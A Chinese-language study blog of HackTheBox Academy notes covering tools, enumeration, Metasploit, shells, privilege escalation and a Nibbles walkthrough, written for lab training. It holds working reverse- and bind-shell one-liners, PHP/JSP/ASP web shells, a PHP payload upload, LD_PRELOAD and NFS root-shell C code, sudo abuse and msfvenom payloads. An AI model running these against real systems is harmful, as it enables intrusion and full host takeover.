0%

hackthebox学习记录

hackthebox 是一个不错的安全学习平台。

可以按 https://academy.hackthebox.eu/paths 提供的技能路径进行学习

QQ群:397745473

Basic Toolset

工具集学习

在此路径中,模块涵盖了在网络和 Web 应用程序渗透测试中取得成功所需的基本工具。这并不是我们作为安全从业者可以使用的所有工具(开源和商业)的详尽列表,而是涵盖了我们发现自己在执行的每项技术评估中使用的久经考验的真实工具。学习如何使用基本工具集是必不可少的,因为渗透测试中使用了许多不同的工具。我们需要了解在我们将遇到的各种情况下使用它们中的哪一个。

如果我们在理解长命令时遇到问题,可以获得帮助的另一个有用资源是:https : //explainshell.com/

Command Description
man <tool> Opens man pages for the specified tool.
<tool> -h Prints the help page of the tool.
apropos <keyword> Searches through man pages’ descriptions for instances of a given keyword.
cat Concatenate and print files.
whoami Displays current username.
id Returns users identity.
hostname Sets or prints the name of the current host system.
uname Prints operating system name.
pwd Returns working directory name.
ifconfig The ifconfig utility is used to assign or view an address to a network interface and/or configure network interface parameters.
ip Ip is a utility to show or manipulate routing, network devices, interfaces, and tunnels.
netstat Shows network status.
ss Another utility to investigate sockets.
ps Shows process status.
who Displays who is logged in.
env Prints environment or sets and executes a command.
lsblk Lists block devices.
lsusb Lists USB devices.
lsof Lists opened files.
lspci Lists PCI devices.
sudo Execute command as a different user.
su The su utility requests appropriate user credentials via PAM and switches to that user ID (the default user is the superuser). A shell is then executed.
useradd Creates a new user or update default new user information.
userdel Deletes a user account and related files.
usermod Modifies a user account.
addgroup Adds a group to the system.
delgroup Removes a group from the system.
passwd Changes user password.
dpkg Install, remove and configure Debian-based packages.
apt High-level package management command-line utility.
aptitude Alternative to apt.
snap Install, remove and configure snap packages.
gem Standard package manager for Ruby.
pip Standard package manager for Python.
git Revision control system command-line utility.
systemctl Command-line based service and systemd control manager.
ps Prints a snapshot of the current processes.
journalctl Query the systemd journal.
kill Sends a signal to a process.
bg Puts a process into background.
jobs Lists all processes that are running in the background.
fg Puts a process into the foreground.
curl Command-line utility to transfer data from or to a server.
wget An alternative to curl that downloads files from FTP or HTTP(s) server.
python3 -m http.server Starts a Python3 web server on TCP port 8000.
ls Lists directory contents.
cd Changes the directory.
clear Clears the terminal.
touch Creates an empty file.
mkdir Creates a directory.
tree Lists the contents of a directory recursively.
mv Move or rename files or directories.
cp Copy files or directories.
nano Terminal based text editor.
which Returns the path to a file or link.
find Searches for files in a directory hierarchy.
updatedb Updates the locale database for existing contents on the system.
locate Uses the locale database to find contents on the system.
more Pager that is used to read STDOUT or files.
less An alternative to more with more features.
head Prints the first ten lines of STDOUT or a file.
tail Prints the last ten lines of STDOUT or a file.
sort Sorts the contents of STDOUT or a file.
grep Searches for specific results that contain given patterns.
cut Removes sections from each line of files.
tr Replaces certain characters.
column Command-line based utility that formats its input into multiple columns.
awk Pattern scanning and processing language.
sed A stream editor for filtering and transforming text.
wc Prints newline, word, and byte counts for a given input.
chmod Changes permission of a file or directory.
chown Changes the owner and group of a file or directory.

重点记录

下载openvpn连接

https://openvpn.net/client-connect-vpn-for-windows/

可以用 Bitvise ssh client 连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# 建立简单服务器
python3 -m http.server # python3
http-server -p 8080 # npm install http-server
php -S 127.0.0.1:8080 # php


#查文件索引号命令: ls -i /var/backups/shadow.bak

# What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?
$ find / -type f -name *.conf -user root -size +25k -size -28k -newermt 2020-03-03 -exec ls -al {} \; 2>/dev/null

# How many files exist on the system that have the ".bak" extension?
$ find / -type f -name *.bak -exec ls -al {} \; 2>/dev/null |wc -l

# Submit the full path of the "xxd" binary.
$ find / -type f -name xxd -exec ls -al {} \; 2>/dev/null

# How many files exist on the system that have the ".log" file extension?
$ find / -type f -name *.log -exec ls -al {} \; 2>/dev/null |wc -l

# How many total packages are installed on the target system?
$ dpkg -l | grep -c '^ii'

# How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
$ ss -l -4 | grep -v "127\.0\.0" | grep "LISTEN" | wc -l

# Determine what user the ProFTPd server is running under. Submit the username as the answer.
$ ps -ef|grep ftpd

# Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
curl https://www.inlanefreight.com |tr " " "\n" | cut -d"'" -f2 | cut -d'"' -f2 | grep "www.inlanefreight.com" | sort -u | wc -l

# js 混淆在线工具
http://beautifytools.com/javascript-obfuscator.php
https://jsconsole.com
https://obfuscator.io
https://beautifier.io/

# 代码编辑器
https://prettier.io/playground/
http://www.jsnice.org/

# Base64 Encode Decode
$ echo https://www.hackthebox.eu/ | base64
$ echo aHR0cHM6Ly93d3cuaGFja3RoZWJveC5ldS8K | base64 -d

# Hex Encode Decode
$ echo https://www.hackthebox.eu/ | xxd -p
$ echo 68747470733a2f2f7777772e6861636b746865626f782e65752f0a | xxd -p -r

# Rot13 Encode Decode
$ echo https://www.hackthebox.eu/ | tr 'A-Za-z' 'N-ZA-Mn-za-m'
$ echo uggcf://jjj.unpxgurobk.rh/ | tr 'A-Za-z' 'N-ZA-Mn-za-m'

# Using what you learned in this section, determine the type of encoding used in the string you got at previous exercise, and decode it. To get the flag, you can send a 'POST' request to 'serial.php', and set the data as "serial=YOUR_DECODED_OUTPUT".
$ curl http://188.166.173.208:31747/serial.php -X POST -d "serial=7h15_15_a_s3cr37_m3554g3"




parrotsec 系统

1
2
3
4
5
6
7
8
# 下载 https://parrotsec.org/download/
# 虚拟机版 https://www.parrotsec.org/virtual/
# 安装 https://docs.parrotlinux.org/installation.html
# 配置 https://docs.parrotlinux.org/parrot-software-management.html
# 论坛 https://community.parrotsec.org/c/support/6
# docker版
docker run --rm -ti --network host -v $PWD/work:/work parrotsec/security
# 参考使用说明 https://parrotsec.org/docs/parrot-on-docker.html

nmap 扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
$ nmap -sV -sC -p- 10.129.42.253
$ nmap --script smb-os-discovery.nse -p445 10.10.10.40
$ nmap -A -p445 10.129.42.253
$ smbclient -N -L \\\\10.129.42.253
$ smbclient \\\\10.129.42.253\\users
$ smbclient -U bob \\\\10.129.42.253\\users

# Perform an Nmap scan of the target. What service is running on port 8080? (two words)
$ nmap -A -p8080 10.129.42.254
# Perform an Nmap scan of the target and identify the non-default port that the telnet service running on.
$ nmap -A 10.129.42.254
# List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.
$ smbclient -N -L \\\\10.129.42.254
$ smbclient -U bob \\\\10.129.42.254\\users
bob:Welcome1

web

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# 目录/文件枚举
# https://github.com/ffuf/ffuf
# https://github.com/OJ/gobuster
$ gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt

# DNS 子域枚举
# 工具 https://github.com/danielmiessler/SecLists # 安装 SecLists 方法略
# 接下来,将 DNS 服务器(例如 1.1.1.1)添加到/etc/resolv.conf文件中。我们将定位域名inlanefreight.com,即一个虚构的货运和物流公司的网站。
$ gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt

# 网络枚举技巧 工具:curl -IL 和 EyeWitness
# 另一个方便的工具是 EyeWitness,它可用于截取目标 Web 应用程序的屏幕截图、指纹并识别可能的默认凭据。
# https://github.com/FortyNorthSecurity/EyeWitness
$ curl -IL https://www.inlanefreight.com # 抓Banner和Headers

# whatweb
# 我们可以使用命令行工具 whatweb 提取 Web 服务器、支持框架和应用程序的版本。这些信息可以帮助我们查明正在使用的技术并开始搜索潜在的漏洞
$ whatweb 10.10.10.121
$ whatweb --no-errors 10.10.10.0/24
# Certificates Robots.txt

# Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag.
$ gobuster dir -u http://142.93.35.92:31581/ -w /usr/share/dirb/wordlists/common.txt
http://142.93.35.92:31581/
http://142.93.35.92:31581/robots.txt
http://142.93.35.92:31581/admin-login-page.php
[CTRL + U] 得到用户名密码登陆后拿到flag

Public Exploits

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ sudo apt install exploitdb -y
$ searchsploit openssh 7.2
$ msfconsole
msf6 > search exploit eternalblue
msf6 > use exploit/windows/smb/ms17_010_psexec
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.40
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0
msf6 exploit(windows/smb/ms17_010_psexec) > check
msf6 exploit(windows/smb/ms17_010_psexec) > exploit
meterpreter > getuid
meterpreter > shell
C:\WINDOWS\system32>whoami

# Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
$msfconsole
msf6 > search simple backup
msf6 > use 0
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > show options
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > set RHOSTS 142.93.35.92
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > set RPORT 30715
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > run
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > set FILEPATH /flag.txt
msf6 auxiliary(scanner/http/wp_simple_backup_file_read) > run
执行后会出现一个文件路径,就是把远程的文件下载到本地了

Shells

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
# Reverse Shell 反弹
# 先监听一个端口
$ nc -lvnp 1234
$ ip a # 查IP

# 再在远程机器上执行命令反弹一个shell到监听了一个端口的电脑上
# Reverse Shell Command
# Code: bash
bash -c 'bash -i >& /dev/TCP/10.10.10.10/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f


# Code: powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.10.10",1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

# -----------------------------------------
# Bind Shell 正向连接
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

# Code: python
python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

# Code: powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

# 连接命令
$ nc 10.10.10.1 1234

# 升级TTY
# nc 连接服务器后操作不是很方便可以用以下方式升级一下tty让操作更加顺
$ python -c 'import pty; pty.spawn("/bin/bash")'
运行此命令后,我们将ctrl+z后台运行我们的 shell 并返回到我们的本地终端,并输入以下stty命令:
$ ^Z
$ stty raw -echo
$ fg

$ echo $TERM
$ stty size
$ export TERM=xterm-256color
$ stty rows 67 columns 318

# webshell
# 代码: php
<?PHP system($_GET['cmd']);?>
# 代码:jsp
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
# 代码:asp
<% eval request("cmd") %>

网络服务器 默认 Webroot
Apache /var/www/html/
Nginx /usr/local/nginx/html/
IIS c:\inetpub\wwwroot\
XAMPP C:\xampp\htdocs\

写shell方法: echo "<?PHP system(\$_GET['cmd']);?>" > /var/www/html/shell.php

# 访问方法 http://SERVER_IP:PORT/shell.php?cmd=id

另一种选择是使用cURL:
$ curl http://SERVER_IP:PORT/shell.php?cmd=id

Privilege Escalation

提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# 参考资料
https://book.hacktricks.xyz/
linux 提权: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
windows提权: https://book.hacktricks.xyz/windows/checklist-windows-privilege-escalation

https://github.com/swisskyrepo/PayloadsAllTheThings
linux: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
windows: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md

# 枚举脚本
linux:
https://github.com/rebootuser/LinEnum
https://github.com/sleventyeleven/linuxprivchecker

windows:
https://github.com/GhostPack/Seatbelt
https://github.com/411Hall/JAWS

用于服务器枚举的另一个有用工具是 Privilege Escalation Awesome Scripts SUITE (PEASS),因为它维护得很好以保持最新状态,并且包括用于枚举 Linux 和 Windows 的脚本。
https://github.com/carlospolop/PEASS-ng

# 测试 自动linux提权脚本
$ ./linpeas.sh

# Kernel Exploits 内核漏洞利用
# Vulnerable Software 易受攻击的软件 dpkg -l 查看已安装的软件
# User Privileges 用户权限
Sudo
SUID
Windows Token Privileges
$ sudo -l
$ sudo su -

# Scheduled Tasks 计划任务
/etc/crontab
/etc/cron.d
/var/spool/cron/crontabs/root

# Exposed Credentials 暴露的凭据 配置文件、日志文件和用户历史文件(Linux 中的 bash_history 和 Windows 中的 PSReadLine)中

# SSH Keys SSH 密钥
.ssh directory
/home/user/.ssh/id_rsa or /root/.ssh/id_rsa
比如 得到 id_rsa 文件后可以在本机执行:
$ vim id_rsa
$ chmod 600 id_rsa
$ ssh user@10.10.10.10 -i id_rsa
# 如果这个文件有写权限, 我们可以将我们的公钥放在用户的 ssh 目录 /home/user/.ssh/authorized_keys 中。
$ ssh-keygen -f key
生成后 把pub文件放到远程机器中 $ echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
用以下命令就能直接登陆了
$ ssh root@10.10.10.10 -i key

# https://academy.hackthebox.eu/module/details/51
# https://academy.hackthebox.eu/module/details/67

# SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.
$ sudo -l
可以看到 User user1 may run the following commands on gettingstartedprivesc-261588-68d7c7c946-5m4k5:
(user2 : user2) NOPASSWD: /bin/bash
$ sudo -u user2 /bin/bash
$ cat ~/flag.txt

# Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.
user2 有访问root目录下的id_rsa的权限
$ cat /etc/ssh/ssh_config 看到本地ssh的端口是80 所以直接连上去就可以了
$ ssh root@127.0.0.1 -p 80 -i /root/.ssh/id_rsa

Transferring Files

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# 建立文件服务器	
$ python3 -m http.server 8000

# 下载
$ wget http://10.10.14.1:8000/linenum.sh
$ curl http://10.10.14.1:8000/linenum.sh -o linenum.sh

# Using SCP
$ scp linenum.sh user@remotehost:/tmp/linenum.sh

# Using Base64 例如,如果我们想传输一个名为 shell 的二进制文件,我们可以将它的 base64 编码如下:
$ base64 shell -w 0
$ echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA...SNIO...lIuy9iaW4vc2gAU0iJ51JXSInmDwU | base64 -d > shell

# Validating File Transfers 要验证文件的格式,我们可以在其上运行 file 命令:
$ file shell
# 可以检查它的 md5 哈希值。在我们的机器上,我们可以在其上运行 md5sum:
$ md5sum shell

Starting Out

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
# 靶机 
# OWASP Juice Shop是一个用 Node.js、Express 和 Angular 编写的现代易受攻击的 Web 应用程序,它展示了整个 OWASP 前十名以及许多其他实际应用程序安全漏洞。
https://owasp.org/www-project-juice-shop/

# Metasploitable 2 是一个故意易受攻击的 Ubuntu Linux VM,可用于练习枚举、自动和手动利用。
https://docs.rapid7.com/metasploit/metasploitable-2-exploitability-guide/

# Metasploitable 3 是用于构建配置了广泛漏洞的易受攻击的 Windows VM 的模板。
https://github.com/rapid7/metasploitable3

# DVWA 这是一个易受攻击的 PHP/MySQL Web 应用程序,展示了许多具有不同难度的常见 Web 应用程序漏洞。
https://github.com/digininja/DVWA

# YouTube Channels 有许多 YouTube 频道展示了渗透测试/黑客技术。一些值得收藏的有:
# IppSec 提供每个退役 HTB 盒子的极其深入的演练,其中充满了他自己的经验以及有关各种技术的视频。
https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
# VbScrub 提供 HTB 视频以及技术视频,主要关注 Active Directory 的利用。
https://www.youtube.com/channel/UCpoyhjwNIWZmsiKNKpsMAQQ
# STÖK 提供有关各种信息安全相关主题的视频,主要侧重于漏洞赏金和 Web 应用程序渗透测试。
https://www.youtube.com/channel/UCQN2DsjnYH60SFBIA6IkNwg
# LiveOverflow 提供有关各种技术信息安全主题的视频
https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w

# Blogs
# 一个值得一看的伟大博客是 0xdf hacks 的东西。
https://0xdf.gitlab.io/

# Tutorial Websites 教程网站
# 有许多教程网站可用于练习基本的 IT 技能,例如脚本编写。
# 这些网站旨在通过“战争游戏”格式的各种场景帮助培训用户分别使用 Windows PowerShell 和 Linux 命令行。
https://www.underthewire.tech/index.htm
https://overthewire.org/wargames/


# HTB Starting Point
https://www.hackthebox.eu/home/start
# HTB Tracks
https://www.hackthebox.eu/home/tracks

# 适合初学者的 HTB 机器
https://www.hackthebox.eu/home/machines/profile/1
https://www.hackthebox.eu/home/machines/profile/51
https://www.hackthebox.eu/home/machines/profile/121
https://www.hackthebox.eu/home/machines/profile/108
https://www.hackthebox.eu/home/machines/profile/144

# 视频
# https://www.youtube.com/watch?list=PLidcsTyj9JXJfpkDrttTdk1MNT6CDwVZF&v=mC7G3i2gV54
# https://www.youtube.com/watch?list=PLidcsTyj9JXL4Jv6u9qi8TcUgsNoKKHNn&v=-KBm3tBNK74

# HTB 平台包含各种类别的一次性挑战。一些适合初学者的挑战包括:
https://www.hackthebox.eu/home/challenges/Reversing?name=Find%20The%20Easy%20Pass
https://www.hackthebox.eu/home/challenges/Crypto?name=Weak%20RSA
https://www.hackthebox.eu/home/challenges/Pwn?name=You%20know%200xDiablos

# Dante Prolab 是迄今为止提供的最适合初学者的实验室。
https://www.hackthebox.eu/home/labs/pro/view/4

Navigating HTB

1
2
3
4
# 您可以在左侧窗格中或通过单击顶部窗格中的用户名来访问您的 HTB 个人资料页面。
https://app.hackthebox.eu/profile/overview
https://app.hackthebox.eu/tracks

Nibbles - Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
视频	https://www.youtube.com/watch?v=s_0GcRGv6Ds
演练 https://0xdf.gitlab.io/2018/06/30/htb-nibbles.html

# Nmap 查找开放端口
$ nmap -sV --open -oA nibbles_initial_scan <ip address>
这将针对默认的前 1,000 个端口运行服务枚举 (-sV) 扫描,并且仅返回打开的端口 (--open)。
我们可以通过使用命令 nmap -v -oG - 在没有指定目标的情况下运行扫描来检查 nmap 针对给定扫描类型扫描哪些端口。
$ nmap -sV --open -oA nibbles_initial_scan 10.129.42.190
$ nmap -sC -p 22,80 -oA nibbles_script_scan 10.129.42.190

# Run an nmap script scan on the target. What is the Apache version running on the server? (answer format: X.X.XX)
$ nmap -sC -p 80 -oA nibbles_script_scan 10.129.42.190
2.4.18

# 我们可以使用 whatweb 来尝试识别正在使用的 Web 应用程序。
$ whatweb http://10.129.42.190/nibbleblog
# Nibbleblog,这是一个使用 PHP 构建的免费博客引擎。
https://www.nibbleblog.com/

# 目录枚举
# https://www.rapid7.com/db/modules/exploit/multi/http/nibbleblog_file_upload/
$ gobuster dir -u http://10.129.42.190/nibbleblog/ --wordlist /usr/share/dirb/wordlists/common.txt
$ curl -s http://10.129.42.190/nibbleblog/content/private/users.xml | xmllint --format -
# Hydra 等工具进行暴力登录
$ gobuster dir -u http://10.129.42.190/ --wordlist /usr/share/dirb/wordlists/common.txt
$ curl -s http://10.129.42.190/nibbleblog/content/private/config.xml | xmllint --format -
使用Hashcat等工具进行离线密码破解或尝试猜测密码时,使用 CeWL 等工具抓取网站生成的词表,成功破解密码哈希(例如公司的无线网络密码)的情况并不少见。
https://github.com/digininja/CeWL


# 反弹shell 清单
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
https://highon.coffee/blog/reverse-shell-cheat-sheet/

# 升级tty
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
$ python -c 'import pty; pty.spawn("/bin/bash")'

# Nibbles - Privilege Escalation
# 自动提权
# 上传文件 sudo python3 -m http.server 8080
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh



# Escalate privileges and submit the root.txt flag.
gobuster dir -u http://10.129.211.6/ -w /usr/share/dirb/wordlists/common.txt
curl -s http://10.129.211.6/nibbleblog/content/private/users.xml | xmllint --format -
curl -s http://10.129.211.6/nibbleblog/content/private/config.xml | xmllint --format -
http://10.129.211.6/nibbleblog/admin.php
admin / nibbles
http://10.129.211.6/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
http://10.129.211.6/nibbleblog/content/private/plugins/my_image/

<?php system('id'); ?>
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.203 8888 >/tmp/f"); ?>
nc -lvnp 8888
curl http://10.129.211.6/nibbleblog/content/private/plugins/my_image/image.php
python3 -c 'import pty; pty.spawn("/bin/bash")'
sudo python3 -m http.server 8000
wget http://10.10.14.203:8000/LinEnum.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.203 8889 >/tmp/f' | tee -a monitor.sh
nc -lvnp 8889
sudo /home/nibbler/personal/stuff/monitor.sh


# Spawn the target, gain a foothold and submit the contents of the user.txt flag.
nmap -sV --open -oA nibbles_initial_scan 10.129.133.76

Knowledge Check

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
这一个模块是给出一个IP 使用上面学到的方法进行攻击。
给了一些提示资料:
1. 用Nmap 扫描端口
2. whatweb 和 Gobuster cms和路径扫描
3. 如果知道了网站的域名 改 /etc/hosts 让网站显示全部
4. Searchsploit 找公开漏洞利用
5. 得到反弹shell后用 Python3 pty 提升一下终端的使用体验
6. 执行文件系统的手动和自动枚举,以查找错误配置、具有已知漏洞的服务以及明文形式的敏感数据(如凭据)
7. 有两种方法得到shell。一种是Metasploit 一种是手动执行
8. 提权方法 可以用 下面两种
https://github.com/rebootuser/LinEnum
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS

# 得到目标
10.129.225.231
# 安装所需工具
$ sudo apt install exploitdb -y
$ searchsploit openssh 7.2

# 先用nmap 扫下看开了哪些端口
nmap -sV --open -oA nibbles_initial_scan 10.129.225.231

sudo apt-get install libxml2-utils 安装一个xml解析工具
# https://gtfobins.github.io/ 这里有很多提权的方式 这里有收集一些正常文件用来利用提权拿shell的方法


Linux Privilege Escalation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
# 查找可写目录
$ find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null
# 查找可写文件
$ find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null

# https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

# Kernel Exploits
$ https://github.com/dirtycow/dirtycow.github.io

# Bash 单行反向 shell
# http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# 反弹
$ bash -i >& /dev/tcp/10.10.15.169/443 0>&1
# 监听
$ nc -lnvp 443

# 特殊权限提权 https://linuxconfig.org/how-to-use-special-permissions-the-setuid-setgid-and-sticky-bits
# suid: find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
# guid: find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null


# Sudo Rights Abuse sudo 提权
$ cat /tmp/.test (建立文件)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.169 443 >/tmp/f
#执行 $ sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
# 开监听 $ nc -lnvp 443

# 路径滥用
echo $PATH
# 通配符滥用
# 凭证搜寻
$ cat wp-config.php | grep 'DB_USER\|DB_PASSWORD'
$ find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null
$ ls ~/.ssh
# 共享库 LD_PRELOAD 权限提升
$ cat << EOF > root.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
EOF
# 编译时报错可忽略
$ gcc -fPIC -shared -o root.so root.c -nostartfiles
执行提权: $ sudo LD_PRELOAD=/tmp/root.so /usr/bin/openssl

# 共享对象劫持
Ldd显示对象的位置以及它被加载到每个程序依赖项的内存中的十六进制地址

# Privileged Groups
# 杂技
showmount -e
cat /etc/exports

cat << EOF > shell.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}
EOF
showmount -e 10.129.170.31
gcc shell.c -o shell
sudo mount -t nfs 10.129.170.31:/tmp /mnt

使用MSF建立反弹SHELL

1
2
3
4
5
6
7
8
9
10
11
12
# 生成shell
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.169 LPORT=4444 > msfshell.php
$ python3 -m http.server

# 将shell上传到靶主机中,然后使用msfconsole连接。
use exploit/multi/handler
set PAYLOAD /php/meterpreter/reverse_tcp
set LHOST 10.10.15.169
set PORT 4444
run
python3 -c 'import pty; pty.spawn("/bin/bash")'

QQ群:397745473

欢迎关注我的其它发布渠道